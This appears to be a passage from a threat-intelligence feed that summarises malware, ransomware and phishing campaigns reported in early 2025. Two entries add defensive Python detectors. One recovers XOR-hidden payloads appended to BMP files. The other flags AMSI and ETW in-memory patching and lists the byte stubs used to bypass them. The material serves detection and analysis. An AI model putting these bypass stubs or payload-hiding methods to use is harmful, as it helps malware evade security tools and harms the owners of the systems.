Researchers at Check Point have analyzed a macOS stealer called Banshee that targets macOS users to steal browser credentials, cryptocurrency wallet data and files. It first appeared in July 2024 and is sold by Russian-speaking cybercriminals as a stealer-as-a-service on Telegram and dark web forums such as XSS and Exploit. A newer version replaces plaintext strings with string encryption using an algorithm lifted from Apple's XProtect antivirus engine. It is distributed through phishing emails and malicious GitHub repositories and can steal data from browsers including Chrome, Brave, Edge and Opera, as well as from extensions for cryptocurrency wallets and two-factor authentication.
Source: https://research.checkpoint.com/2025/banshee-macos-stealer-that-stole-code-from-macos-xprotect/
2025-01-11
TA397_Bitter_APT_Espionage_Campaigns
LOW
+
Intel Source:
Cyfirma
Intel Name:
TA397_Bitter_APT_Espionage_Campaigns
Date of Scan:
2025-01-11
Impact:
LOW
Summary:
Researchers at Cyfirma profile TA397, also known as Bitter, a South Asian cyber espionage group that targets government, energy, telecommunications, defense and engineering organizations in the EMEA and APAC regions. TA397 uses multi-stage delivery tactics, including RAR archives containing alternate data streams (ADS) and decoy files.
Source: https://www.cyfirma.com/research/apt-profile-ta397/
2025-01-11
Hexalocker_Ransomware_V2
MEDIUM
+
Intel Source:
Cyble
Intel Name:
Hexalocker_Ransomware_V2
Date of Scan:
2025-01-11
Impact:
MEDIUM
Summary:
Cyble researchers have analyzed version 2 of HexaLocker, a ransomware that first emerged in 2024. This version modifies registry keys and creates Run entries so the malware executes again after a system reboot. It employs double extortion, exfiltrating sensitive information before encryption so that victims pay for both data recovery and confidentiality. The ransomware encrypts files with ChaCha20 and incorporates the Skuld stealer, which steals browser data, cookies, saved credit card details, login credentials and cryptocurrency wallet information. Encrypted files receive the .HexaLockerv2 extension, and the attackers communicate with victims through a unique hash instead of the traditional methods used previously.
Source: https://cyble.com/blog/hexalocker-v2-being-proliferated-by-skuld-stealer/
2025-01-11
CrowdStrike_Recruitment_Phishing_Scam
LOW
+
Intel Source:
CrowdStrike
Intel Name:
CrowdStrike_Recruitment_Phishing_Scam
Date of Scan:
2025-01-11
Impact:
LOW
Summary:
On January 7, 2025, CrowdStrike reported a phishing campaign using its recruitment branding to distribute malware. The attack starts with a phishing email impersonating CrowdStrike's recruitment team, leading victims to a malicious website. There, they are tricked into downloading a fake "employee CRM application," which serves as a downloader for the XMRig cryptominer.
Source: https://www.crowdstrike.com/en-us/blog/recruitment-phishing-scam-imitates-crowdstrike-hiring-process/
2025-01-10
HeartCrypt_Malware_Packing_Method_Update
LOW
+
Intel Source:
PaloAlto
Intel Name:
HeartCrypt_Malware_Packing_Method_Update
Date of Scan:
2025-01-10
Impact:
LOW
Summary:
HeartCrypt, a packer-as-a-service (PaaS) for Windows malware, was first identified in February 2024. It hides malware within legitimate portable executable (PE) files to evade detection. Following a December 2024 report on HeartCrypt, recent samples show changes in the packing method: the position-independent code (PIC) used to reconstruct the payload has been removed from the PE file's resource data, and the payload is instead stored in two fake BMP image files, each containing XOR-encrypted blocks of data that are decrypted and combined to form the final payload. The extraction process has been updated to handle the new technique.
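A generic check for the trick above, a payload hidden behind an image header. A BMP declares its own file size in the header, so anything after the declared size is an overlay that a renderer never looks at. The code below is an added example and not Unit 42's extractor: it builds a small constructed BMP, appends an XOR-encoded PE-shaped blob, then carves the overlay and recovers a single-byte key by looking for a consistent MZ/PE signature. HeartCrypt's real block layout and key scheme are not reproduced; the `build_sample` fixture and its key are assumptions for the example.

```python
"""Added example (not Unit 42's code): carve data hidden after a BMP's declared
file size and brute-force a single-byte XOR key by checking for an MZ header
whose e_lfanew lands on a PE signature. Sample BMP and payload are constructed."""
import struct


def build_bmp(width: int = 2, height: int = 2) -> bytes:
    """Constructed 24-bit BMP with all-black pixels; returns the raw file bytes."""
    row = (width * 3 + 3) & ~3          # pixel rows are padded to a multiple of 4 bytes
    pixels = b"\x00" * (row * height)
    file_size = 14 + 40 + len(pixels)   # BITMAPFILEHEADER + BITMAPINFOHEADER + pixels
    file_hdr = struct.pack("<2sIHHI", b"BM", file_size, 0, 0, 54)
    info_hdr = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                           len(pixels), 2835, 2835, 0, 0)
    return file_hdr + info_hdr + pixels


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def carve_overlay(blob: bytes) -> bytes:
    """Return the bytes after the BMP's declared file size (empty if none, or not a BMP)."""
    if len(blob) < 14 or blob[:2] != b"BM":
        return b""
    declared = struct.unpack_from("<I", blob, 2)[0]
    if declared == 0 or declared > len(blob):
        return b""
    return blob[declared:]


def recover_xor_key(overlay: bytes):
    """Try every single-byte key. Return (key, plaintext) when the result starts with 'MZ'
    and the e_lfanew field at 0x3C points at a 'PE\\0\\0' signature; otherwise None."""
    for key in range(256):
        head = xor_bytes(overlay[:0x200], key)      # the header is enough to decide
        if head[:2] != b"MZ" or len(head) < 0x40:
            continue
        e_lfanew = struct.unpack_from("<I", head, 0x3C)[0]
        full = xor_bytes(overlay, key)
        if e_lfanew + 4 <= len(full) and full[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            return key, full
    return None


def fake_pe_header() -> bytes:
    """Constructed stand-in payload: a DOS header whose e_lfanew points at a PE signature."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)
    return bytes(dos) + b"\x00" * (0x80 - 0x40) + b"PE\x00\x00" + b"payload-body"


def build_sample(key: int = 0x5A) -> bytes:
    """Constructed sample: a valid BMP followed by an XOR-encoded, PE-shaped overlay."""
    return build_bmp() + xor_bytes(fake_pe_header(), key)


if __name__ == "__main__":
    overlay = carve_overlay(build_sample())
    print(len(overlay), "overlay bytes;", recover_xor_key(overlay)[0:1], "recovered key")
```

A mismatch between the header's declared size and the actual file length is the cheap triage signal; the key recovery only matters once you want to know what was hidden. Multi-byte or per-block keys, as the summary describes for HeartCrypt, need the same signature check run per block rather than once.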
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-06-changes-to-HeartCrypt-packed-malware.txt
2025-01-10
Redtail_Advanced_Cryptomining_Malware
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Redtail_Advanced_Cryptomining_Malware
Date of Scan:
2025-01-10
Impact:
LOW
Summary:
Researchers at ISC SANS have analyzed a cryptomining malware strain called "redtail" that covertly uses infected systems for cryptocurrency mining. Observed between August and November 2024, Redtail uses scripts that check CPU architecture compatibility and remove competing miners, helping it persist and evade detection.
Source: https://isc.sans.edu/diary/rss/31568
2025-01-10
Skuld_Stealer
LOW
+
Intel Source:
Acronis
Intel Name:
Skuld_Stealer
Date of Scan:
2025-01-10
Impact:
LOW
Summary:
Researchers from Acronis have analyzed an open-source-based stealer called TMPN, also known as Skuld. It first appeared in 2023 and was developed by an actor using the handle Deathined. The malware is distributed through malicious links and compromised websites and targets users globally, with a primary focus on Discord data from gamers and the cryptocurrency community. The stealer injects a malicious JavaScript payload into Discord to extract emails, passwords and user tokens, and also collects data from web browsers, cryptocurrency wallets and local files on the compromised system.
Source: https://www.acronis.com/en-us/cyber-protection-center/posts/tmpn-skuld-stealer-the-dark-side-of-open-source/
2025-01-10
Fake_PoC_Exploit_for_LDAPNightmare
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Fake_PoC_Exploit_for_LDAPNightmare
Date of Scan:
2025-01-10
Impact:
MEDIUM
Summary:
Researchers at Trend Micro have discovered a fake proof-of-concept (PoC) exploit for CVE-2024-49113 (LDAPNightmare) being used to distribute information-stealing malware. The vulnerability, a denial-of-service flaw in Microsoft's Windows LDAP implementation, was patched in December 2024 alongside CVE-2024-49112, a remote code execution bug. The malicious repository, posing as a legitimate Python-based PoC, replaced the original files with a UPX-packed executable (poc.exe), a real risk to security researchers and companies who download and run unverified PoCs.
Source: https://www.trendmicro.com/en_us/research/25/a/information-stealer-masquerades-as-ldapnightmare-poc-exploit.html
2025-01-10
PEAKLIGHT_Advanced_Malware_Campaign
LOW
+
Intel Source:
TRAC Labs
Intel Name:
PEAKLIGHT_Advanced_Malware_Campaign
Date of Scan:
2025-01-10
Impact:
LOW
Summary:
Researchers at TRAC Labs have analyzed a malware campaign known as PEAKLIGHT, which uses obfuscated PowerShell to deploy infostealers through a malware-as-a-service model. Mandiant first documented the campaign, which starts with a Windows shortcut file (LNK) that reaches out to a content delivery network hosting a JavaScript dropper, which in turn runs a PowerShell downloader script.
Source: https://medium.com/trac-labs/peaklight-illuminating-the-shadows-02a1bb44885c
2025-01-09
PHP_Server_Exploit_for_Mining_Cryptocurrency
LOW
+
Intel Source:
ISC.SANS
Intel Name:
PHP_Server_Exploit_for_Mining_Cryptocurrency
Date of Scan:
2025-01-09
Impact:
LOW
Summary:
ISC.SANS researchers have observed incidents involving a sophisticated attack where a vulnerable or misconfigured PHP server is exploited to serve as a platform for cryptocurrency mining, specifically using the PacketCrypt (PKTC) algorithm. The chain of events outlined in the investigation starts with a malicious URL targeting a vulnerable PHP server running php-cgi.exe, potentially exposed due to misconfigurations or outdated software, like those affected by the CVE-2024-4577 vulnerability.
Source: https://isc.sans.edu/diary/PacketCrypt+Classic+Cryptocurrency+Miner+on+PHP+Servers/31564/
2025-01-09
Evolution_and_Growing_Threat_of_Gayfemboy_Botnet
LOW
+
Intel Source:
XLab
Intel Name:
Evolution_and_Growing_Threat_of_Gayfemboy_Botnet
Date of Scan:
2025-01-09
Impact:
LOW
Summary:
The Gayfemboy botnet, initially a simple variant of Mirai, evolved significantly after its discovery in February 2024 by XLab. Initially unremarkable, it rapidly progressed by modifying its code, integrating Nday and 0day vulnerabilities, and expanding its attack capabilities. By November 2024, Gayfemboy exploited the 0day vulnerabilities of Four-Faith Industrial Routers, Neterbit routers, and Vimar smart home devices, growing its infection scale to over 15,000 active nodes. XLab's monitoring revealed its unique traits, including regular DDoS attacks against registered domain names. Despite its beginnings as a basic Mirai variant, Gayfemboy transformed into a sophisticated, large-scale botnet with advanced attack capabilities.
Source: https://blog.xlab.qianxin.com/gayfemboy/#ioc
2025-01-08
Turla_Cyber_Campaign_Targeting_Pakistan
LOW
+
Intel Source:
SOCRadar
Intel Name:
Turla_Cyber_Campaign_Targeting_Pakistan
Date of Scan:
2025-01-08
Impact:
LOW
Summary:
Turla is a well-known state-sponsored threat group that has targeted Pakistan's critical infrastructure, including the energy, telecommunications and government sectors. It uses phishing emails and malware to gain unauthorized access to networks and exploits vulnerabilities such as CVE-2022-38028 to infiltrate systems. The attackers use techniques like DLL hijacking to stay hidden and strong encryption to secure their communications. The malware not only steals sensitive information but can also disrupt the operations of the targeted systems.
Source: https://socradar.io/turla-cyber-campaign-pakistans-critical-infrastructure/
2025-01-08
Black_Basta_Deploying_Multiple_Malware
MEDIUM
+
Intel Source:
SOCRadar
Intel Name:
Black_Basta_Deploying_Multiple_Malware
Date of Scan:
2025-01-08
Impact:
MEDIUM
Summary:
Black Basta is a highly capable ransomware group that targets industries such as healthcare, finance, manufacturing, energy and national security worldwide. It combines social engineering, malware families like Zbot and DarkGate, and custom-built tools to infiltrate systems. Attacks often begin with phishing emails carrying malicious attachments. The group also uses Microsoft Teams to impersonate IT support staff, using display names like Help Desk or Technical Support, to persuade employees to install remote access tools such as AnyDesk, Quick Assist or TeamViewer, which the attackers then use to bypass security controls and deliver malware.
Source: https://socradar.io/black-basta-deploying-zbot-darkgate-bespoke-malware/
2025-01-07
Cyberhaven_Extension_Breach
HIGH
+
Intel Source:
Secure Annex & Keep Aware
Intel Name:
Cyberhaven_Extension_Breach
Date of Scan:
2025-01-07
Impact:
HIGH
Summary:
On December 24, 2024, Cyberhaven, a data loss prevention vendor, disclosed a breach in which a phishing attack compromised an employee's Chrome Web Store developer account. The attacker used that account to publish a malicious version (24.10.4) of the Cyberhaven extension containing code that could steal authenticated sessions and cookies and send them to an attacker-controlled domain. Cyberhaven's customers include Snowflake, Motorola, Canon and Reddit. The malicious package was removed within an hour of detection by Cyberhaven's internal security team.
Source: https://secureannex.com/blog/cyberhaven-extension-compromise/ https://keepaware.com/blog/cyberhaven-browser-extension-compromise
2025-01-06
SwaetRAT_Delivery_Through_Python
LOW
+
Intel Source:
ISC.SANS
Intel Name:
SwaetRAT_Delivery_Through_Python
Date of Scan:
2025-01-06
Impact:
LOW
Summary:
ISC SANS analyzed a multi-stage Python script that targets Windows hosts. It patches the Windows API functions AmsiScanBuffer() and EtwEventWrite() in memory to evade detection and logging, then loads a Base64-encoded .NET assembly that is executed via reflection. That assembly (SwaetRAT) establishes persistence by copying itself to specific directories and modifying the registry so it runs at startup, also creates a shortcut in the Startup folder, and connects to a remote C2 server for further control.
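The in-memory patching described above leaves a simple artefact: the first bytes of the patched export in the live process no longer match the same export in the clean DLL on disk, and they usually match one of a handful of well-known stubs. The checker below is an added example, not code from the ISC diary or the malware. The "clean" prologues are constructed stand-ins (the real bytes vary by Windows build and must be read from the mapped file), and the "snapshot" of a patched process is likewise constructed; a real collector would fill both from ReadProcessMemory and the on-disk image.

```python
"""Added example (not from the ISC diary): flag AmsiScanBuffer / EtwEventWrite
patching by diffing live export prologues against the on-disk image and
matching known bypass stubs. All byte strings below are constructed."""
from typing import Dict, List, Optional, Tuple

# Stubs commonly written over the export entry by AMSI/ETW bypass tooling:
#   mov eax, 0x80070057 ; ret  -> AmsiScanBuffer returns E_INVALIDARG, nothing is scanned
#   ret                        -> EtwEventWrite becomes a no-op
#   xor eax, eax ; ret         -> returns 0 (success) without doing anything
KNOWN_STUBS = {
    bytes.fromhex("B857000780C3"): "mov eax,E_INVALIDARG; ret",
    bytes.fromhex("C3"): "ret",
    bytes.fromhex("33C0C3"): "xor eax,eax; ret",
    bytes.fromhex("31C0C3"): "xor eax,eax; ret",
}


def check_export(name: str, disk_bytes: bytes, memory_bytes: bytes,
                 compare_len: int = 16) -> Tuple[str, Optional[str]]:
    """Return (status, detail). 'clean' = prologue matches disk; 'patched' = starts with a
    known bypass stub; 'modified' = differs from disk but matches no known stub."""
    if memory_bytes[:compare_len] == disk_bytes[:compare_len]:
        return ("clean", None)
    for stub, desc in KNOWN_STUBS.items():
        if memory_bytes.startswith(stub):
            return ("patched", f"{name}: {desc}")
    first_diff = next(i for i, (a, b) in enumerate(zip(disk_bytes, memory_bytes)) if a != b)
    return ("modified", f"{name}: first difference at offset {first_diff}")


def scan_process(snapshots: Dict[str, bytes], disk_images: Dict[str, bytes]) -> List[tuple]:
    """snapshots and disk_images map export name -> bytes at the export's entry point.
    Returns every export that is not clean."""
    findings = []
    for export, mem in snapshots.items():
        status, detail = check_export(export, disk_images[export], mem)
        if status != "clean":
            findings.append((export, status, detail))
    return findings


# Constructed stand-ins for the clean on-disk prologues (real values differ per build).
CLEAN = {
    "amsi.dll!AmsiScanBuffer": bytes.fromhex("4C8BDC49895B0849896B104989731857415641574883EC70"),
    "ntdll.dll!EtwEventWrite": bytes.fromhex("4C8BDC4883EC58488B0530420B00"),
}
# Constructed snapshot of a process in which a loader patched both exports.
PATCHED_PROCESS = {
    "amsi.dll!AmsiScanBuffer": bytes.fromhex("B857000780C3") + CLEAN["amsi.dll!AmsiScanBuffer"][6:],
    "ntdll.dll!EtwEventWrite": bytes.fromhex("C3") + CLEAN["ntdll.dll!EtwEventWrite"][1:],
}

if __name__ == "__main__":
    for finding in scan_process(PATCHED_PROCESS, CLEAN):
        print(finding)
```

Comparing against the on-disk image rather than a hard-coded byte list is what keeps this working across Windows builds; the stub table only adds a label to the finding.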
Source: https://isc.sans.edu/diary/SwaetRAT+Delivery+Through+Python/31554/
2025-01-06
NPM_Campaign_Targets_Ethereum_Developers
LOW
Intel Source:
Socket
Intel Name:
NPM_Campaign_Targets_Ethereum_Developers
Date of Scan:
2025-01-06
Impact:
LOW
Summary:
Socket researchers have uncovered a malicious campaign targeting Ethereum developers with fake npm packages disguised as legitimate Hardhat plugins from the Nomic Foundation. The attackers use typosquatted package names such as @nomicsfoundation/sdk-test and @nomisfoundation/hardhat-configure to trick developers into downloading them. Once installed, these packages steal sensitive data such as private keys, mnemonics, and configuration details by abusing Hardhat's Runtime Environment (HRE). The stolen data is encrypted using a predefined AES key and sent to attacker-controlled servers.
Source: https://socket.dev/blog/malicious-npm-campaign-targets-ethereum-developers
2025-01-06
EAGERBEE_Backdoor_Targets_Middle_East
LOW
Intel Source:
Securelist
Intel Name:
EAGERBEE_Backdoor_Targets_Middle_East
Date of Scan:
2025-01-06
Impact:
LOW
Summary:
Researchers at Securelist have discovered a new deployment of the EAGERBEE backdoor, which targets ISPs and government agencies in the Middle East, with updated and previously unseen components. These include a service injector, which injects the backdoor into running services, as well as previously undocumented plugins that enable malicious actions such as payload delivery, file system exploration, and command execution.
Source: https://securelist.com/eagerbee-backdoor/115175/
2025-01-06
NonEuclid_Remote_Access_Trojan
LOW
Intel Source:
Cyfirma
Intel Name:
NonEuclid_Remote_Access_Trojan
Date of Scan:
2025-01-06
Impact:
LOW
Summary:
Researchers from CYFIRMA have identified malware called NonEuclid Remote Access Trojan, which allows attackers to gain unauthorized remote access to and control over a victim's machine. It is capable of bypassing antivirus programs, escalating privileges, and encrypting critical files to deploy ransomware. Tutorials for this malware are available on underground forums, Discord and YouTube. The malware maintains active communication between the compromised device and the attacker using a client socket. If the connection is lost, it keeps trying to reconnect to ensure that the attacker retains control over the victim's device for as long as possible.
Source: https://www.cyfirma.com/research/noneclid-rat/
2025-01-06
Remote_Template_Injection_Attack
LOW
Intel Source:
Cyfirma
Intel Name:
Remote_Template_Injection_Attack
Date of Scan:
2025-01-06
Impact:
LOW
Summary:
Researchers at CYFIRMA have described an advanced attack vector known as Remote Template Injection, which uses Microsoft Word's template functionality to deliver malicious payloads. This approach, commonly used by advanced persistent threats (APTs) such as FIN7, exploits user trust by embedding links to harmful templates in Word documents. These decoy documents evade standard defenses like email gateways and endpoint detection systems because they appear harmless until they download and run malicious macros from remote servers.
Source: https://www.cyfirma.com/research/living-off-the-land-the-mechanics-of-remote-template-injection-attack/
2025-01-05
Malicious_Campaigns_Proliferate_from_VSCode_to_NPM
LOW
Intel Source:
Reversinglabs
Intel Name:
Malicious_Campaigns_Proliferate_from_VSCode_to_NPM
Date of Scan:
2025-01-05
Impact:
LOW
Summary:
ReversingLabs researchers have observed an increase in malicious activity related to the VSCode Marketplace. Initially, attackers used npm packages to deliver malicious code into VSCode extensions. In late 2024, a campaign that started with malicious VSCode extensions moved to npm with a package called etherscancontracthandler. Malicious npm packages not only pose a risk to Node.js applications but can also compromise other npm packages and VSCode extensions, affecting local development environments. The campaign targets developers and the crypto community, and later impersonated apps like Zoom, using reviews and inflated install counts to appear legitimate.
Source: https://www.reversinglabs.com/blog/a-new-playground-malicious-campaigns-proliferate-from-vscode-to-npm
2025-01-05
Water_Makara_Campaign
LOW
Intel Source:
SOC Radar
Intel Name:
Water_Makara_Campaign
Date of Scan:
2025-01-05
Impact:
LOW
Summary:
The Water Makara campaign targets Brazilian organizations in sectors such as banking, national security, retail, and manufacturing. The attackers use spear-phishing techniques to trick victims into opening malicious links or attachments that deliver the Astaroth malware. Once the malware is active, it steals sensitive information such as login credentials and personal data, enabling cybercriminals to infiltrate systems further.
Source: https://socradar.io/water-makara-campaign-a-spear-phishing-attack-on-brazilian-enterprises/
2025-01-05
Evolving_Infection_Chains_by_Lazarus
MEDIUM
Intel Source:
Securelist
Intel Name:
Evolving_Infection_Chains_by_Lazarus
Date of Scan:
2025-01-05
Impact:
MEDIUM
Summary:
Researchers from SecureList have discovered the Lazarus group extending its infection chain by merging old and new malware in its DeathNote campaign, also known as "Operation DreamJob." The gang targets people in fields such as defense, aerospace, and cryptocurrencies, and uses false job postings to transmit malicious archive files.
Source: https://securelist.com/lazarus-new-malware/115059/
2025-01-05
APT_C_26_Lazarus_Attack_Using_Weaponized_IPMsg
MEDIUM
Intel Source:
360 Threat Intelligence Center
Intel Name:
APT_C_26_Lazarus_Attack_Using_Weaponized_IPMsg
Date of Scan:
2025-01-05
Impact:
MEDIUM
Summary:
Researchers at 360 Advanced Threat Research Institute have discovered that the Lazarus group has weaponized the IPMsg installer by embedding malicious code within it. When the user runs the installer, it simultaneously executes the legitimate IPMsg version to deceive the user, while activating a malicious DLL in memory. This DLL connects to a remote server to download a backdoor and steal sensitive information. This attack highlights Lazarus' social engineering tactics, which trick users into executing harmful programs.
Source: https://mp.weixin.qq.com/s/XuaMRmZSomKFoaX7XrqpYA
2025-01-05
Phishing_for_Banking_Information
LOW
Intel Source:
ISC.SANS
Intel Name:
Phishing_for_Banking_Information
Date of Scan:
2025-01-05
Impact:
LOW
Summary:
Researchers from ISC.SANS have observed a significant rise in phishing scams targeting banking information during the holiday season, using lures such as credit card verification, parcel shipping, and prizes. A recent case involves a bogus text message posing as a Bank of Montreal (BMO) alert, sent from an unidentified area code rather than BMO's actual short code, "266898."
Source: https://isc.sans.edu/diary/Phishing+for+Banking+Information/31548/
2025-01-05
UAC_0125_Tor_Backdoor_Malware_Attack
LOW
Intel Source:
CERT-UA
Intel Name:
UAC_0125_Tor_Backdoor_Malware_Attack
Date of Scan:
2025-01-05
Impact:
LOW
Summary:
Researchers from CERT-UA have discovered an attack campaign tracked as UAC-0125 that used fraudulent web resources imitating the "Army+" application to deliver malware. These websites, hosted on Cloudflare Workers, prompt users to download a malicious installer called "ArmyPlusInstaller-v.0.10.23722.exe," which was built with NSIS. The installer includes a .NET decoy file, Python interpreter files, Tor components, and a PowerShell script that configures an OpenSSH server, generates and exfiltrates RSA private keys, and establishes covert SSH access through Tor.
Source: https://cert.gov.ua/article/6281701
2025-01-05
A_Deep_Dive_into_Kimsuky_Group
MEDIUM
Intel Source:
Picussecurity
Intel Name:
A_Deep_Dive_into_Kimsuky_Group
Date of Scan:
2025-01-05
Impact:
MEDIUM
Summary:
Picus researchers have provided insights into the North Korean cyber espionage group Kimsuky, also known as Black Banshee, which has been active since 2012. The group primarily targets political, economic, and military organisations for intelligence gathering and data theft. Initially the group targeted organisations in South Korea, but over time it has expanded its activities to the United States, Japan, Russia, and Europe, including sectors such as education, business services and manufacturing. The group employs both open-source and custom malware such as RandomQuery, XRAT and Gold Dragon to infiltrate systems and exfiltrate sensitive data. XRAT provides keylogging, remote shell access and file management, while Gold Dragon is designed for persistence and advanced data exfiltration.
Source: https://www.picussecurity.com/resource/blog/exposing-the-steps-of-the-kimsuky-apt-group
2025-01-05
ClickFix_Campaign
LOW
Intel Source:
SOC Radar
Intel Name:
ClickFix_Campaign
Date of Scan:
2025-01-05
Impact:
LOW
Summary:
The ClickFix campaign targets both Windows and macOS by leveraging social engineering tactics. In this campaign, the attackers entice users with fake Google Meet error messages. These messages claim there is a connection issue and urge users to resolve it by downloading files or running commands. When users follow the instructions, they unknowingly install Lumma Stealer or DarkGate malware, which collect login credentials, browser history, and cryptocurrency wallet details.
Source: https://socradar.io/clickfix-campaign-fake-google-meet-alerts-malware/
2025-01-04
Recent_Cases_of_Watering_Hole_Attacks
LOW
Intel Source:
JPCert
Intel Name:
Recent_Cases_of_Watering_Hole_Attacks
Date of Scan:
2025-01-04
Impact:
LOW
Summary:
Researchers from JPCERT have described two watering hole attack incidents in Japan. The first involved a university research laboratory's website that was compromised in 2023, where visitors encountered a fake Adobe Flash Player update request; downloading and executing the file infected the machine with malware. In the second incident, the attackers used malware called Tips.exe disguised as a file from Japan's Ministry of Economy, Trade, and Industry. This malware uses uncommon tricks such as calling unusual Windows functions and disabling antivirus software.
Source: https://blogs.jpcert.or.jp/en/2024/12/watering_hole_attack_part1.html
2025-01-04
Fake_Game_Sites_Lead_to_Information_Stealers
LOW
Intel Source:
MalwareBytes
Intel Name:
Fake_Game_Sites_Lead_to_Information_Stealers
Date of Scan:
2025-01-04
Impact:
LOW
Summary:
Researchers at Malwarebytes have discovered an online scam in which cybercriminals contact victims through Discord, email, or text messages, claiming to be game developers offering beta testing opportunities for a new video game. Victims receive a download link and a password for a compressed file, hosted on platforms such as Dropbox or Catbox, containing an installer. The installer actually delivers information-stealing malware such as Nova Stealer, Ageo Stealer or Hexon Stealer. These stealers are capable of stealing browser-stored credentials, session cookies, cryptocurrency wallet details, 2FA backup codes and credit card information.
Source: https://www.malwarebytes.com/blog/news/2025/01/can-you-try-a-game-i-made-fake-game-sites-lead-to-information-stealers
2025-01-04
OtterCookie_Malware
MEDIUM
Intel Source:
NTT
Intel Name:
OtterCookie_Malware
Date of Scan:
2025-01-04
Impact:
MEDIUM
Summary:
Researchers from NTT have uncovered a new malware called OtterCookie in the Contagious Interview campaign, which is attributed to North Korea. This malware was first observed in September 2024. It communicates with attackers using Socket.IO and can execute remote commands, steal sensitive information and monitor the victim's system environment. The campaign targets multiple victims and uses various methods to distribute the malware. The attacks often start with compromised Node.js projects or npm packages, or more recently with Qt or Electron applications. The attackers use loaders that execute OtterCookie by downloading JSON data and running the JavaScript payloads it contains.
Source: https://jp.security.ntt/tech_blog/contagious-interview-ottercookie
2025-01-02
Butcher_Shop_Phishing_Campaign
LOW
Intel Source:
Obsidian
Intel Name:
Butcher_Shop_Phishing_Campaign
Date of Scan:
2025-01-02
Impact:
LOW
Summary:
The Obsidian research team has discovered a phishing campaign called Butcher Shop that targets Microsoft 365 accounts, with a focus on the legal, government and construction sectors. The attackers abuse email redirects and open redirect vulnerabilities on trusted domains (for example, company.com) that then lead users to malicious sites (for example, evil.com). The technique exploits legitimate services such as Canva, Google AMP and Dropbox's DocSend, as well as compromised WordPress sites. In this campaign, 200 domains and 400 unique URLs have been identified. Furthermore, the attackers place Cloudflare Turnstile challenges in front of the links.
Source: https://obsidiansecurity.com/blog/butcher-shop-phishing-campaign-targets-organizations/
2025-01-02
Earth_Koshchei_Rogue_RDP_Campaign
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Earth_Koshchei_Rogue_RDP_Campaign
Date of Scan:
2025-01-02
Impact:
MEDIUM
Summary:
Researchers at Trend Micro have discovered that the APT group Earth Koshchei, which is considered to be supported by the SVR, carried out a large-scale rogue RDP campaign targeting high-profile sectors. The group used spear-phishing emails, red team tools, and advanced anonymization techniques to carry out their attacks. Earth Koshchei's technique included RDP relays, rogue RDP servers, and malicious RDP configuration files, which might result in data loss and malware installation.
Source: https://www.trendmicro.com/en_us/research/24/l/earth-koshchei.html
2025-01-02
CoinLurker_A_Data_Stealing_Malware
LOW
Intel Source:
Morphisec
Intel Name:
CoinLurker_A_Data_Stealing_Malware
Date of Scan:
2025-01-02
Impact:
LOW
Summary:
Researchers at Morphisec have uncovered an advanced data-stealing malware called CoinLurker, written in Go. It has become popular among cybercriminals targeting cryptocurrency wallets, sensitive personal data and financial applications. CoinLurker takes inspiration from earlier scams such as SocGholish, ClearFake, ClickFix and FakeCAPTCHA, which trick users through fake software updates, phishing emails and malicious CAPTCHA prompts. The attackers also employ advanced techniques such as EtherHiding, which uses blockchain technology to hide malicious payloads, and run the code directly in memory to avoid leaving traces on disk. CoinLurker connects to its C2 servers using socket-based communication and specifically steals data from cryptocurrency wallets and financial applications by scanning the relevant directories on the victim's device.
Source: https://blog.morphisec.com/coinlurker-the-stealer-powering-the-next-generation-of-fake-updates
2025-01-01
HeartCrypt_Boosts_Malware_Campaigns
MEDIUM
Intel Source:
Palo Alto
Intel Name:
HeartCrypt_Boosts_Malware_Campaigns
Date of Scan:
2025-01-01
Impact:
MEDIUM
Summary:
Researchers at Palo Alto Networks have uncovered HeartCrypt, a new packer-as-a-service (PaaS) that has been in development since July 2023 and was first deployed in February 2024. HeartCrypt, which is marketed on underground forums and Telegram, charges $20 per file to pack Windows x86 and .NET payloads, mostly for malware families such as LummaStealer, Remcos, and Rhadamanthys. HeartCrypt makes analysis difficult by inserting malicious code into genuine binaries and using obfuscation techniques such as position-independent code (PIC), multi-layered encoding, and resource-based execution.
Source: https://unit42.paloaltonetworks.com/packer-as-a-service-heartcrypt-malware/
2025-01-01
New_I2PRAT_Communication
LOW
Intel Source:
G-Data
Intel Name:
New_I2PRAT_Communication
Date of Scan:
2025-01-01
Impact:
LOW
Summary:
G DATA researchers have discovered a malware campaign in which attackers use the I2P anonymity network to hide their infrastructure. The attack begins with a phishing email containing a link to a fake CAPTCHA webpage that tricks the user into copying a malicious PowerShell script and running it by pressing specific key combinations. The script downloads the malware and executes it while distracting the user by opening a pornographic website. The malware first checks whether it has admin privileges and, if not, bypasses security controls to gain admin access. It then loads another component that connects to the C2 server and sends basic system information such as the operating system version and username.
Source: https://www.gdatasoftware.com/blog/2024/12/38093-ip2rat-malware
2025-01-01
APT41_Targets_Cybercriminals_Via_Glutton_Malware
MEDIUM
Intel Source:
Xlabs
Intel Name:
APT41_Targets_Cybercriminals_Via_Glutton_Malware
Date of Scan:
2025-01-01
Impact:
MEDIUM
Summary:
Researchers from XLab have discovered a new PHP-based backdoor called Glutton targeting industries such as IT services, business operations, and social security in China and the United States. The Glutton malware is linked to the Chinese state-sponsored group Winnti, also known as APT41. It is a malware framework that infects PHP-based systems and targets popular frameworks such as Baota, ThinkPHP, Yii and Laravel. It collects sensitive data, injects malicious code, and installs an ELF backdoor that resembles a known Winnti tool called PWNLNX. The backdoor can execute PHP code, transfer files, modify system files and switch communication protocols. Additionally, Glutton targets both organizations and cybercriminals: it compromises enterprise systems and advertises them on hacker forums to gain access to criminal networks, and it uses tools like HackBrowserData to steal sensitive information from cybercriminals for future phishing or social engineering campaigns.
Source: https://blog.xlab.qianxin.com/glutton_stealthily_targets_mainstream_php_frameworks-en/
2024-12-29
The_Rise_of_LummaStealer
LOW
Intel Source:
Cybereason
Intel Name:
The_Rise_of_LummaStealer
Date of Scan:
2024-12-29
Impact:
LOW
Summary:
